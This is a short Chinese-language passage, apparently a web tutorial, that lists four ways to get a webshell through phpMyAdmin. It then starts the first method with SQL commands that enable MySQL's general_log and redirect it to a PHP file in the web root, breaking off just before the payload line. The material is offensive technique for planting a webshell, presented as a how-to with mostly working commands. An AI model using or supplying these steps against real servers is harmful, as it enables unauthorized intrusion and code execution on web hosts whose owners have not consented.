phpmyadmin常见的getshell的几种方法,一共是四种:1、日志文件写 shell2、在知道绝对路径的情况下,利用INTO OUTFILE 3、慢查询写入webshell4、创建数据库和表写入webshell:
1、日志文件写 shell(phpmyadmin getshell的四种方法)
general_log 默认关闭,开启它可以记录用户输入的每条命令,会把其保存在对应的日志文件中。可以尝试自定义日志文件,并向日志文件里面写入内容的话,那么就可以成功 getshell:
# 查看当前配置 phpmyadmin常见的getshell的几种方法
SHOW VARIABLES LIKE 'general%';
# 更改日志文件位置 phpmyadmin常见的getshell的几种方法
set global general_log = "ON";
set global general_log_file='C:/phpStudy/WWW/zyx.php';
# 往日志里面写入 payload
select